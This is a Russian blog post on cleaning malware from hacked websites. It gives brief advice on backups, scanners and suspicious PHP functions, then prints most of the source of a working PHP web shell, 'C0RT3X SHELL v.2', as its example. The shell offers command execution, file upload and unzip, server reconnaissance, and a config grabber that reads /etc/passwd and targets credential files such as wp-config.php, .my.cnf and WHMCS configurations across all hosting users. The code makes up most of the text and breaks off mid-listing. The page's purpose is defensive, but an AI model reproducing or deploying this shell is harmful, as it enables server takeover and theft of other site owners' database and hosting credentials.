Перейти к содержанию

Лечение сайта от вирусов

Надеюсь вы читаете только в ознакомительных целях так как если ваш сайт заразили это уже очень плохо и если у вас нет бэкапа то дело еще хуже.

Что такое взлом сайта – это незаконное получение несанкционированного доступа к защищенной информации или функциональности сайта. Вариантов проникновения прямо очень много от слабых пароле до уязвимостей.

Что делать если тебя взломали и есть бэкап?

  1. Восстановить из резервной копии если она есть и она не находилась вместе с сайтом то лучше восстановить
  2. Понять как проникли если у вас CMS проверить обновления , если самописный то лучше обратиться к разработчику

Что делать если нет бэкапа?

Начну с того что это прямо очень плохо, недавно чистил сайт где не было актуального бэкапа да и вообще его не было.

  1. Понять что сделали и когда, не редко бывает так что не сразу замечают не сразу и потом сложно сказать какие файлы были залиты
  2. Пройтись разными скриптами для поиска веб шелов например Ai Bolit или мой любимый скрипт PHP Antimalware Scanner
  3. После очистки сделать полный бэкап и найти точку входа через которую на него проникли.

find ~ -name “*htaccess*” Чаще всего вирусы пишут на php (так называемые шеллы). В коде таких вирусов на php распространены конструкции:

eval() preg_replace() gzuncompress() base64_decode()

Пример вредоносного кода

<?
//C0RT3X SHELL v.2
$code = '@session_start(); 
@set_time_limit(0); 

//PASSWORD CONFIGURATION

@$pass = $_POST['pass']; 
$chk_login = true; 
$password = "t3x.v2";
//END CONFIGURATION 

if($pass == $password) 
{ 
 $_SESSION['nst'] = "$pass"; 
} 

if($chk_login == true) 
{ 
 if(!isset($_SESSION['nst']) or $_SESSION['nst'] != $password) 
 { 
 die(" 
  <title>C0RT3X SHELL LOGIN v.2</title>
   <link rel='stylesheet' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css'>
   <link href='https://fonts.googleapis.com/css?family=Kelly+Slab' rel='stylesheet' type='text/css'>
<link href='https://i.pinimg.com/originals/5c/75/35/5c75351c814bbdb48b719a66641b452d.png' rel='icon' type='image/x-icon'>
<body bgcolor='#000000'>
<style>
.logo-200 {
    border: 3px solid #f1284e;
    border-radius: 200px;
    margin-right: 10px;
}
</style>
  <center>
<tr><td><img src='https://i.pinimg.com/originals/5c/75/35/5c75351c814bbdb48b719a66641b452d.png' class='logo-200 photo' style='width:370px; height:370px;' border='3'><br>
<font face='kelly slab' size='5' color='#f1284e'>[</font><font face='kelly slab' size='5' color='#ffffff'>C0RT3X SHELL LOGIN v.2</font><font face='kelly slab' size='5' color='#f1284e'>]</font>
  <form method='post'>
  <center><input type='password' name='pass' style='font-family:kelly slab;margin-top:10px;width:150px;background:transparent;color:#ffffff;border:2px solid #f1284e;border-radius:2px;'> 
  </form>  </center> 
  <center>
  <i class='fa fa-globe' color='#f1284e'></i><font face='kelly slab' size='2' color='white'><strong>Host Target: ".$_SERVER["HTTP_HOST"]." &nbsp;|
  <i class='fa fa-globe' color='#f1284e'></i><font face='kelly slab' size='2' color='white'><strong>IP: ".gethostbyname($_SERVER["HTTP_HOST"])." &nbsp;|
  <i class='fa fa-user' color='#f1284e'></i><font face='kelly slab' size='2' color='white'><strong>My IP: ".$_SERVER["REMOTE_ADDR"]." 
  </td></tr></table> 
  </td></tr></table>   </center> 
  ");
 }
}
error_reporting(0);
set_time_limit(0);

if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
echo '<!DOCTYPE HTML>
<html>
<head>
   <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">
<title>C0RT3X SHELL v.2</title>
<link href="https://i.pinimg.com/originals/5c/75/35/5c75351c814bbdb48b719a66641b452d.png" rel="icon" type="image/x-icon">
<style>
body{
  background-color: #000d2a;
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
  font-family:kelly slab;
color: white;
}
#content tr:hover{
	background:#000000;
	color:#f1284e;
	border:2px solid #f1284e;
	border-radius:2px;
}
#content .first{
	background:#f1284e;
	color:#fff;
	border:2px solid #f1284e;
	border-radius:2px;
}
table{
    border: 2px #000d2a dotted;
}
H1{
	font-family :kelly slab;
}
a{
    color:#fff;
    text-decoration:none;
}
a:hover {
	background:#000000;
	color:#02BC8C;
	text-decoration: underline;
}
input,select,textarea{
    border: 1px #000000 solid;
    -moz-border-radius: 5px;
    -webkit-border-radius:5px;
    border-radius:2px;
}
.ryuu {
	border: 2px solid #f1284e; border-radius:2px
}
.katsumi {
	font-family:kelly slab;
	font-size: 18px;
    border: 2px solid #f1284e; border-radius:2px;
	width: 500px;
	height: 300px;
	padding-left: 5px;
	margin: 10px auto;
	resize: none;
	background: transparent;
	color: #ffffff;
}
.c0r {
	border: 2px solid #f1284e; border-radius:2px;
	width: 150px;
	height: 27px;
	padding-left: 5px;
	margin: 10px auto;
	resize: none;
	background: transparent;
	color: #ffffff;
	font-family:kelly slab;
	font-size: 18px;
}
.t3x {
	font-family:kelly slab;
	font-size:20px;
	margin-top:10px;width:50px;
	background:transparent;
	color:#fff;
	border:2px solid #f1284e;
	border-radius:2px
}
.ishiki {
	border: 2px solid #f1284e; border-radius:2px;
	width: 450px;
	height: 25px;
	padding-left: 5px;
	margin: 10px auto;
	resize: none;
	background: transparent;
	color: white;
	font-family: kelly slab;
	font-size: 18px;
}
.tatsuya {
	border: 2px solid #f1284e; border-radius:2px;
	width: 205;
	height: 30px;
	padding-left: 5px;
	margin: 10px auto;
	resize: none;
	background: transparent;
	color: #f1284e;
	font-family: kelly slab;
	font-size: 18px;
}
.sena {
	font-family: kelly slab;
	margin-top: 10px;
	width: 80px;
	background: transparent;
	color: #fff;
	border:2px solid #f1284e;
	border-radius:2px
}
.cmd-style {
	background:transparent;
	font-family:kelly slab;
	color:#fff;
	border:2px solid #f1284e;
	border-radius:2px
}
.foot-style {
	border: 2px solid #f1284e;
	border-radius:2px;
	width: 420px;
	height: 22px;
	padding-left: 5px;
	margin: 10px auto;
	resize: none;
	background: #000;
	color: #fff;
	font-family: kelly slab;
}
.about-style {
	border: 2px solid #f1284e;
	border-radius:2px;
	width: 450px;
	height: 100px;
	padding-left: 5px;
	margin: 10px auto;
	resize: none;
	background: #000;
	color: #fff;
	font-family: kelly slab;
}
.info {
	border: 2px solid #f1284e;
	border-radius:2px;
	width: 500px;
	padding-left: 5px;
	margin: 10px auto;
	resize: none;
	background: #000;
	color: #fff;
	font-family: kelly slab;
}
.upload-style {
	font-family:kelly slab;
	margin-top:10px;
	width:135px;
	background:transparent;
	color:#ffffff;
	border:2px solid #f1284e;
	border-radius:2px;
}
.upload2-style {
	font-family:kelly slab;
	margin-top:10px;
	width:240px;
	background:transparent;
	color:#fff;
	border:2px solid #f1284e;
	border-radius:2px;
}
</style>
</head>
<body>
<h1><center><font color="#f1284e">[</font><font color="white">C0RT3X SHELL v.2</font><font color="#f1284e">]</font></center></h1>
<table width="100%" class="ryuu" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td><font face="kelly slab" color="#fff" style="background:#f1284e">Current Path :</font> ';
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);

foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
$sport=$_SERVER['SERVER_PORT'];
$kernel = php_uname();
$dir = str_replace("\\","/",$dir);
$scdir = explode("/", $dir);
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color='#02BC8C'>OFF</font>";
$ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
$ds = @ini_get("disable_functions");
$mysql = (function_exists('mysql_connect')) ? "<font color='#02BC8C'>ON</font>" : "<font color=red>OFF</font>";
$curl = (function_exists('curl_version')) ? "<font color='#02BC8C'>ON</font>" : "<font color=red>OFF</font>";
$wget = (exe('wget --help')) ? "<font color='#02BC8C'>ON</font>" : "<font color=red>OFF</font>";
$perl = (exe('perl --help')) ? "<font color='#02BC8C'>ON</font>" : "<font color=red>OFF</font>";
$python = (exe('python --help')) ? "<font color='#02BC8C'>ON</font>" : "<font color=red>OFF</font>";
$show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color='#02BC8C'>NONE</font>";
if(!function_exists('posix_getegid')) {
	$user = @get_current_user();
	$uid = @getmyuid();
	$gid = @getmygid();
	$group = "?";
} else {
	$uid = @posix_getpwuid(posix_geteuid());
	$gid = @posix_getgrgid(posix_getegid());
	$user = $uid['name'];
	$uid = $uid['uid'];
	$group = $gid['name'];
	$gid = $gid['gid'];
}
$d0mains = @file("/etc/named.conf");
			$users=@file('/etc/passwd');
        if($d0mains)
        { 
			$count;  
			foreach($d0mains as $d0main)
			{
				if(@ereg("zone",$d0main))
				{
					preg_match_all('#zone "(.*)"#', $d0main, $domains);
					flush();
					if(strlen(trim($domains[1][0])) > 2)
					{
						flush();
						$count++;
			   		} 
			   	}
			}
		}
		
echo '</table>';
echo "
<div id='menu'>
<center>
<ul>
<a href='?' class='t3x'>Home</a>
<a href='?path=$path&infoweb=infoweb' class='t3x'>Web Info</a>
<a href='?path=$path&cmd=cmd' class='t3x'>Command</a>
<a href='?path=$path&mass_deface=mass_deface' class='t3x'>Mass Deface</a>
<a href='?path=$path&config=config' class='t3x'>Config</a><br>
<a href='?path=$path&jumping=jumping' class='t3x'>Jumping</a>
<a href='?path=$path&zoneh=zoneh' class='t3x'>Zone-H</a>
<a href='?path=$path&csrf=csrf' class='t3x'>CSRF</a>
<a href='?path=$path&unzip=unzip' class='t3x'>Unzip Menu</a>
<a href='?path=$path&about=about' class='t3x'>About</a><br></br>
<form method='post' action='?path=$path&cmd=cmd'>";
echo ' <font style="text-decoration: underline;">'.$user."@".$ip.': ~ $ </font>
   <input type="text" class="cmd-style" name="cmd"><input type="submit" name="do_cmd" value=">>" class="cmd-style">
</center></form></td></tr></center>';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '<center><font color="#02BC8C">Upload Berhasil Senpai ^_^</font></center><br />';
}else{
echo '<center><font color="red">Upload Gagal :(</font></center>';
}
}
echo '<center><form enctype="multipart/form-data" method="POST">
<i class="fa fa-upload"></i>&nbsp;<font color="white">File Uploader :</font> <input type="file" name="file" class="upload2-style"/>
<input type="submit" value="Upload" class="sena"/>
</form></center>
</td></tr>';
echo '<hr color="#f1284e">
<iframe width="100%" height="20" scrolling="no" frameborder="no" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/673906073&color=%2302bc8c&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true"></iframe>
<hr color="#f1284e">';
if(isset($_GET['filesrc'])){
echo "<tr><td>Current File : ";
echo $_GET['filesrc'];
echo '</tr></td></table><br />';
echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}elseif(isset($_GET['about']) == 'about') {
echo '<style>
.logo-85 {
    border: 3px solid #f1284e;
    border-radius: 100px;
    margin-right: 10px;
}
</style>
<center>
<img src="https://i.pinimg.com/originals/5c/75/35/5c75351c814bbdb48b719a66641b452d.png" class="logo-85 photo"height="185" width="185"/><br>
  <div class="about-style"><i class="fa fa-book"></i><b>About Us:</b><br>Sebenarnya shell ini dibuat tidak ada alasan khusus,Shell ini dibuat karena saya merasa bosan atau gabut, Jadi intinya shell ini dibuat karena ke isengan saya saja:)
  </div></center>';
  }elseif(isset($_GET['unzip']) == 'unzip') {
	echo "<center><h2>Zip Menu</h2>";
function rmdir_recursive($path) {
    foreach(scandir($path) as $file) {
       if ('.' === $file || '.$path.' === $file) continue;
       if (is_dir("$path/$file")) rmdir_recursive("$path/$file");
       else unlink("$path/$file");
   }
   rmdir($path);
}
if($_FILES["zip_file"]["name"]) {
	$filename = $_FILES["zip_file"]["name"];
	$source = $_FILES["zip_file"]["tmp_name"];
	$type = $_FILES["zip_file"]["type"];
	$name = explode(".", $filename);
	$accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
	foreach($accepted_types as $mime_type) {
		if($mime_type == $type) {
			$okay = true;
			break;
		} 
	}
	$continue = strtolower($name[1]) == 'zip' ? true : false;
	if(!$continue) {
		$message = "Sumimasen, kore wa zip janai senpai:(";
	}
  $path = dirname(__FILE__).'/';
  $filenoext = basename ($filename, '.zip'); 
  $filenoext = basename ($filenoext, '.ZIP');
  $targetdir = $path . $filenoext;
  $targetzip = $path . $filename; 
  if (is_dir($targetdir))  rmdir_recursive ( $targetdir);
  mkdir($targetdir, 0777);
	if(move_uploaded_file($source, $targetzip)) {
		$zip = new ZipArchive();
		$x = $zip->open($targetzip); 
		if ($x === true) {
			$zip->extractTo($targetdir);
			$zip->close();
 
			unlink($targetzip);
		}
		$message = "<font color='#02BC8C'>Unzip berhasil! :)</font>";
	} else {	
		$message = "<font color='red'>Unzip gagal, Gomene senpai :(</font>";
	}
}	
echo '<table style="width:53%" noborder>
  <tr><td><center><h3><i class="fa fa-upload"></i>&nbsp;Upload And Unzip &nbsp;<i class="fa fa-file-zip-o"></i></h3><center><form enctype="multipart/form-data" method="post" action="">
<label><center>Zip File : <input type="file" name="zip_file" class="upload2-style"/></label>
<input type="submit" name="submit" value="Upload And Unzip" class="upload-style"/></center>
</form><br></td><td></table><br>';
if($message) echo "<p>$message</p>";
echo "<table style=width:53% noborder>
  <tr><td><center><h3><i class='fa fa-file-zip-o'></i>&nbsp;Zip Backup</h3><form action='' method='post'><i class='fa fa-folder'></i>&nbsp;<font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='path' value='$path' class='ishiki'><br><i class='fa fa-folder-open'></i>&nbsp;<font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$path/C0RT3X_backup.zip' class='ishiki'><br><input type='submit' name='backup' value='BackUp!' class='sena'></center></form><br>";	
	if($_POST['backup']){ 
	$save=$_POST['save'];
	function Zip($source, $destination)
{
    if (extension_loaded('zip') === true)
    {
        if (file_exists($source) === true)
        {
            $zip = new ZipArchive();

            if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
            {
                $source = realpath($source);

                if (is_dir($source) === true)
                {
                    $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);

                    foreach ($files as $file)
                    {
                        $file = realpath($file);

                        if (is_dir($file) === true)
                        {
                            $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
                        }

                        else if (is_file($file) === true)
                        {
                            $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
                        }
                    }
                }

                else if (is_file($source) === true)
                {
                    $zip->addFromString(basename($source), file_get_contents($source));
                }
            }

            return $zip->close();
        }
    }

    return false;
}
	Zip($_POST['path'],$save);
	echo "<font color='#02BC8C'>Backup berhasil!</font> , Tersimpan di: <b>$save</b>";
	}
	echo "</td></table><td><table style=width:53% noborder>
  <tr><td><center><h3><i class='fa fa-file-zip-o'></i>&nbsp;Unzip Manual</h3><form action='' method='post'><i class='fa fa-folder'></i>&nbsp;<font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$path/file.zip' class='ishiki'><br><i class='fa fa-folder-open'></i>&nbsp;<font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$path/C0RT3X_unzip' class='ishiki'><br><input type='submit' name='extrak' value='Unzip!' class='sena'><br></center></form>";
	if($_POST['extrak']){
	$save=$_POST['save'];
	$zip = new ZipArchive;
	$res = $zip->open($_POST['dir']);
	if ($res === TRUE) {
		$zip->extractTo($save);
		$zip->close();
	echo '<font color="#02BC8C">Unzip berhasil!</font> , Lokasinya di: <b>'.$save.'</b>';
	} else {
	echo '<font color="red">Unzip gagal!, Gomene senpai :(</font>';
	}
	}
echo '</tr></table><br><br><br>';	
}elseif(isset($_GET['infoweb']) == 'infoweb') {
echo '<center><h2><font color="f1284e">-</font>&nbsp;<i aria-hidden="true" class="fa fa-globe"></i>&nbsp;<font face="kelly slab" size="4" color="#fff">Website Info:</font>&nbsp;<font color="f1284e">-</font></u></h2></center>';
echo '<div class="info">';
echo "Kernel: <font color='#f1284e'>".$kernel."</font><br>";
echo "User: <font color='#f1284e'>".$user."</font> (".$uid.") Group: <font color='#f1284e'>".$group."</font> (".$gid.")<br>";
echo "Server IP: <font color='#f1284e'>".$ip."</font> | Your IP: <font color='#f1284e'>".$_SERVER['REMOTE_ADDR']."</font><br>";
echo "HDD: <font color='#f1284e'>$used</font> / <font color='#f1284e'>$total</font> ( Free: <font color='#f1284e'>$freespace</font> )<br>";
echo "Websites :<font color='#f1284e'>$count</font>Domains<br>";
echo "Safe Mode: $sm<br>";
echo "Disable Functions: $show_ds<br>";
echo "User: ".$user." (".$uid.") Group: ".$group." (".$gid.")<br>";
echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br></div><br>";

} elseif(isset($_GET['config']) == 'config') {
    $etc = fopen("/etc/passwd", "r") or die("<pre><font color='5'>Can't read /etc/passwd</font></pre>");
    $idx = mkdir("C0RT3X_config", 0777);
    $isi_htc = "Options all\nRequire None\nSatisfy Any";
    $htc = fopen("C0RT3X_config/.htaccess","w");
    fwrite($htc, $isi_htc);
    while($passwd = fgets($etc)) {
        if($passwd == "" || !$etc) {
            echo "<font color=red>Can't read /etc/passwd</font>";
        } else {
            preg_match_all('/(.*?):x:/', $passwd, $user_config);
            foreach($user_config[1] as $user_C0RT3X) {
                $user_config_dir = "home/$user_C0RT3X/public_html";
                if(is_readable($user_config_dir)) {
                    $grab_config = array(
					"/home/$user_C0RT3X/.my.cnf" => "cpanel",
					"/home/$user_C0RT3X/.accesshash" => "WHM-accesshash",
					"/home/$user_C0RT3X/public_html/bw-configs/config.ini" => "BosWeb",
					"/home/$user_C0RT3X/public_html/config/koneksi.php" => "Lokomedia",
					"/home/$user_C0RT3X/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
					"/home/$user_C0RT3X/public_html/clientarea/configuration.php" => "WHMCS",				
					"/home/$user_C0RT3X/public_html/whmcs/configuration.php" => "WHMCS",
					"/home/$user_C0RT3X/public_html/forum/config.php" => "phpBB",
					"/home/$user_C0RT3X/public_html/sites/default/settings.php" => "Drupal",
					"/home/$user_C0RT3X/public_html/config/settings.inc.php" => "PrestaShop",
					"/home/$user_C0RT3X/public_html/app/etc/local.xml" => "Magento",
					"/home/$user_C0RT3X/public_html/admin/config.php" => "OpenCart",
					"/home/$user_C0RT3X/public_html/slconfig.php" => "Sitelok",
					"/home/$user_C0RT3X/public_html/application/config/database.php" => "Ellislab",					
					"/home/$user_C0RT3X/public_html/whm/configuration.php" => "WHMCS",
					"/home/$user_C0RT3X/public_html/whmc/WHM/configuration.ph" => "WHMC",
					"/home/$user_C0RT3X/public_html/central/configuration.php" => "WHM Central",
					"/home/$user_C0RT3X/public_html/whm/WHMCS/configuration.php" => "WHMCS",
					"/home/$user_C0RT3X/public_html/whm/whmcs/configuration.php" => "WHMCS",
					"/home/$user_C0RT3X/public_html/submitticket.php" => "WHMCS",										
					"/home/$user_C0RT3X/public_html/configuration.php" => "Joomla",					
					"/home/$user_C0RT3X/public_html/Joomla/configuration.php" => "JoomlaJoomla",
					"/home/$user_C0RT3X/public_html/joomla/configuration.php" => "JoomlaJoomla",
					"/home/$user_C0RT3X/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",		
					"/home/$user_C0RT3X/public_html/Home/configuration.php" => "JoomlaHome",
					"/home/$user_C0RT3X/public_html/HOME/configuration.php" => "JoomlaHome",
					"/home/$user_C0RT3X/public_html/home/configuration.php" => "JoomlaHome",
					"/home/$user_C0RT3X/public_html/NEW/configuration.php" => "JoomlaNew",
					"/home/$user_C0RT3X/public_html/New/configuration.php" => "JoomlaNew",
					"/home/$user_C0RT3X/public_html/new/configuration.php" => "JoomlaNew",
					"/home/$user_C0RT3X/public_html/News/configuration.php" => "JoomlaNews",
					"/home/$user_C0RT3X/public_html/NEWS/configuration.php" => "JoomlaNews",
					"/home/$user_C0RT3X/public_html/news/configuration.php" => "JoomlaNews",
					"/home/$user_C0RT3X/public_html/Cms/configuration.php" => "JoomlaCms",
					"/home/$user_C0RT3X/public_html/CMS/configuration.php" => "JoomlaCms",
					"/home/$user_C0RT3X/public_html/cms/configuration.php" => "JoomlaCms",
					"/home/$user_C0RT3X/public_html/Main/configuration.php" => "JoomlaMain",
					"/home/$user_C0RT3X/public_html/MAIN/configuration.php" => "JoomlaMain",
					"/home/$user_C0RT3X/public_html/main/configuration.php" => "JoomlaMain",
					"/home/$user_C0RT3X/public_html/Blog/configuration.php" => "JoomlaBlog",
					"/home/$user_C0RT3X/public_html/BLOG/configuration.php" => "JoomlaBlog",
					"/home/$user_C0RT3X/public_html/blog/configuration.php" => "JoomlaBlog",
					"/home/$user_C0RT3X/public_html/Blogs/configuration.php" => "JoomlaBlogs",
					"/home/$user_C0RT3X/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
					"/home/$user_C0RT3X/public_html/blogs/configuration.php" => "JoomlaBlogs",
					"/home/$user_C0RT3X/public_html/beta/configuration.php" => "JoomlaBeta",
					"/home/$user_C0RT3X/public_html/Beta/configuration.php" => "JoomlaBeta",
					"/home/$user_C0RT3X/public_html/BETA/configuration.php" => "JoomlaBeta",
					"/home/$user_C0RT3X/public_html/PRESS/configuration.php" => "JoomlaPress",
					"/home/$user_C0RT3X/public_html/Press/configuration.php" => "JoomlaPress",
					"/home/$user_C0RT3X/public_html/press/configuration.php" => "JoomlaPress",
					"/home/$user_C0RT3X/public_html/Wp/configuration.php" => "JoomlaWp",
					"/home/$user_C0RT3X/public_html/wp/configuration.php" => "JoomlaWp",
					"/home/$user_C0RT3X/public_html/WP/configuration.php" => "JoomlaWP",
					"/home/$user_C0RT3X/public_html/portal/configuration.php" => "JoomlaPortal",
					"/home/$user_C0RT3X/public_html/PORTAL/configuration.php" => "JoomlaPortal",
					"/home/$user_C0RT3X/public_html/Portal/configuration.php" => "JoomlaPortal",					
					"/home/$user_C0RT3X/public_html/wp-config.php" => "WordPress",
					"/home/$user_C0RT3X/public_html/wordpress/wp-config.php" => "WordPressWordpress",
					"/home/$user_C0RT3X/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
					"/home/$user_C0RT3X/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",		
					"/home/$user_C0RT3X/public_html/Home/wp-config.php" => "WordPressHome",
					"/home/$user_C0RT3X/public_html/HOME/wp-config.php" => "WordPressHome",
					"/home/$user_C0RT3X/public_html/home/wp-config.php" => "WordPressHome",
					"/home/$user_C0RT3X/public_html/NEW/wp-config.php" => "WordPressNew",
					"/home/$user_C0RT3X/public_html/New/wp-config.php" => "WordPressNew",
					"/home/$user_C0RT3X/public_html/new/wp-config.php" => "WordPressNew",
					"/home/$user_C0RT3X/public_html/News/wp-config.php" => "WordPressNews",
					"/home/$user_C0RT3X/public_html/NEWS/wp-config.php" => "WordPressNews",
					"/home/$user_C0RT3X/public_html/news/wp-config.php" => "WordPressNews",
					"/home/$user_C0RT3X/public_html/Cms/wp-config.php" => "WordPressCms",
					"/home/$user_C0RT3X/public_html/CMS/wp-config.php" => "WordPressCms",
					"/home/$user_C0RT3X/public_html/cms/wp-config.php" => "WordPressCms",
					"/home/$user_C0RT3X/public_html/Main/wp-config.php" => "WordPressMain",
					"/home/$user_C0RT3X/public_html/MAIN/wp-config.php" => "WordPressMain",
					"/home/$user_C0RT3X/public_html/main/wp-config.php" => "WordPressMain",
					"/home/$user_C0RT3X/public_html/Blog/wp-config.php" => "WordPressBlog",
					"/home/$user_C0RT3X/public_html/BLOG/wp-config.php" => "WordPressBlog",
					"/home/$user_C0RT3X/public_html/blog/wp-config.php" => "WordPressBlog",
					"/home/$user_C0RT3X/public_html/Blogs/wp-config.php" => "WordPressBlogs",
					"/home/$user_C0RT3X/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
					"/home/$user_C0RT3X/public_html/blogs/wp-config.php" => "WordPressBlogs",
					"/home/$user_C0RT3X/public_html/beta/wp-config.php" => "WordPressBeta",
					"/home/$user_C0RT3X/public_html/Beta/wp-config.php" => "WordPressBeta",
					"/home/$user_C0RT3X/public_html/BETA/wp-config.php" => "WordPressBeta",
					"/home/$user_C0RT3X/public_html/PRESS/wp-config.php" => "WordPressPress",
					"/home/$user_C0RT3X/public_html/Press/wp-config.php" => "WordPressPress",
					"/home/$user_C0RT3X/public_html/press/wp-config.php" => "WordPressPress",
					"/home/$user_C0RT3X/public_html/Wp/wp-config.php" => "WordPressWp",
					"/home/$user_C0RT3X/public_html/wp/wp-config.php" => "WordPressWp",
					"/home/$user_C0RT3X/public_html/WP/wp-config.php" => "WordPressWP",
					"/home/$user_C0RT3X/public_html/portal/wp-config.php" => "WordPressPortal",
					"/home/$user_C0RT3X/public_html/PORTAL/wp-config.php" => "WordPressPortal",
					"/home/$user_C0RT3X/public_html/Portal/wp-config.php" => "WordPressPortal",
										"/home1/$user_C0RT3X/.my.cnf" => "cpanel",
					"/home1/$user_C0RT3X/.accesshash" => "WHM-accesshash",
					"/home1/$user_C0RT3X/public_html/bw-configs/config.ini" => "BosWeb",
					"/home1/$user_C0RT3X/public_html/config/koneksi.php" => "Lokomedia",
					"/home1/$user_C0RT3X/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
					"/home1/$user_C0RT3X/public_html/clientarea/configuration.php" => "WHMCS",				
					"/home1/$user_C0RT3X/public_html/whmcs/configuration.php" => "WHMCS",
					"/home1/$user_C0RT3X/public_html/forum/config.php" => "phpBB",
					"/home1/$user_C0RT3X/public_html/sites/default/settings.php" => "Drupal",
					"/home1/$user_C0RT3X/public_html/config/settings.inc.php" => "PrestaShop",
					"/home1/$user_C0RT3X/public_html/app/etc/local.xml" => "Magento",
					"/home1/$user_C0RT3X/public_html/admin/config.php" => "OpenCart",
					"/home1/$user_C0RT3X/public_html/slconfig.php" => "Sitelok",
					"/home1/$user_C0RT3X/public_html/application/config/database.php" => "Ellislab",					
					"/home1/$user_C0RT3X/public_html/whm/configuration.php" => "WHMCS",
					"/home1/$user_C0RT3X/public_html/whmc/WHM/configuration.ph" => "WHMC",
					"/home1/$user_C0RT3X/public_html/central/configuration.php" => "WHM Central",
					"/home1/$user_C0RT3X/public_html/whm/WHMCS/configuration.php" => "WHMCS",
					"/home1/$user_C0RT3X/public_html/whm/whmcs/configuration.php" => "WHMCS",
					"/home1/$user_C0RT3X/public_html/submitticket.php" => "WHMCS",										
					"/home1/$user_C0RT3X/public_html/configuration.php" => "Joomla",					
					"/home1/$user_C0RT3X/public_html/Joomla/configuration.php" => "JoomlaJoomla",
					"/home1/$user_C0RT3X/public_html/joomla/configuration.php" => "JoomlaJoomla",
					"/home1/$user_C0RT3X/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",		
					"/home1/$user_C0RT3X/public_html/Home/configuration.php" => "JoomlaHome",
					"/home1/$user_C0RT3X/public_html/HOME/configuration.php" => "JoomlaHome",
					"/home1/$user_C0RT3X/public_html/home/configuration.php" => "JoomlaHome",
					"/home1/$user_C0RT3X/public_html/NEW/configuration.php" => "JoomlaNew",
					"/home1/$user_C0RT3X/public_html/New/configuration.php" => "JoomlaNew",
					"/home1/$user_C0RT3X/public_html/new/configuration.php" => "JoomlaNew",
					"/home1/$user_C0RT3X/public_html/News/configuration.php" => "JoomlaNews",
					"/home1/$user_C0RT3X/public_html/NEWS/configuration.php" => "JoomlaNews",
					"/home1/$user_C0RT3X/public_html/news/configuration.php" => "JoomlaNews",
					"/home1/$user_C0RT3X/public_html/Cms/configuration.php" => "JoomlaCms",
					"/home1/$user_C0RT3X/public_html/CMS/configuration.php" => "JoomlaCms",
					"/home1/$user_C0RT3X/public_html/cms/configuration.php" => "JoomlaCms",
					"/home1/$user_C0RT3X/public_html/Main/configuration.php" => "JoomlaMain",
					"/home1/$user_C0RT3X/public_html/MAIN/configuration.php" => "JoomlaMain",
					"/home1/$user_C0RT3X/public_html/main/configuration.php" => "JoomlaMain",
					"/home1/$user_C0RT3X/public_html/Blog/configuration.php" => "JoomlaBlog",
					"/home1/$user_C0RT3X/public_html/BLOG/configuration.php" => "JoomlaBlog",
					"/home1/$user_C0RT3X/public_html/blog/configuration.php" => "JoomlaBlog",
					"/home1/$user_C0RT3X/public_html/Blogs/configuration.php" => "JoomlaBlogs",
					"/home1/$user_C0RT3X/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
					"/home1/$user_C0RT3X/public_html/blogs/configuration.php" => "JoomlaBlogs",
					"/home1/$user_C0RT3X/public_html/beta/configuration.php" => "JoomlaBeta",
					"/home1/$user_C0RT3X/public_html/Beta/configuration.php" => "JoomlaBeta",
					"/home1/$user_C0RT3X/public_html/BETA/configuration.php" => "JoomlaBeta",
					"/home1/$user_C0RT3X/public_html/PRESS/configuration.php" => "JoomlaPress",
					"/home1/$user_C0RT3X/public_html/Press/configuration.php" => "JoomlaPress",
					"/home1/$user_C0RT3X/public_html/press/configuration.php" => "JoomlaPress",
					"/home1/$user_C0RT3X/public_html/Wp/configuration.php" => "JoomlaWp",
					"/home1/$user_C0RT3X/public_html/wp/configuration.php" => "JoomlaWp",
					"/home1/$user_C0RT3X/public_html/WP/configuration.php" => "JoomlaWP",
					"/home1/$user_C0RT3X/public_html/portal/configuration.php" => "JoomlaPortal",
					"/home1/$user_C0RT3X/public_html/PORTAL/configuration.php" => "JoomlaPortal",
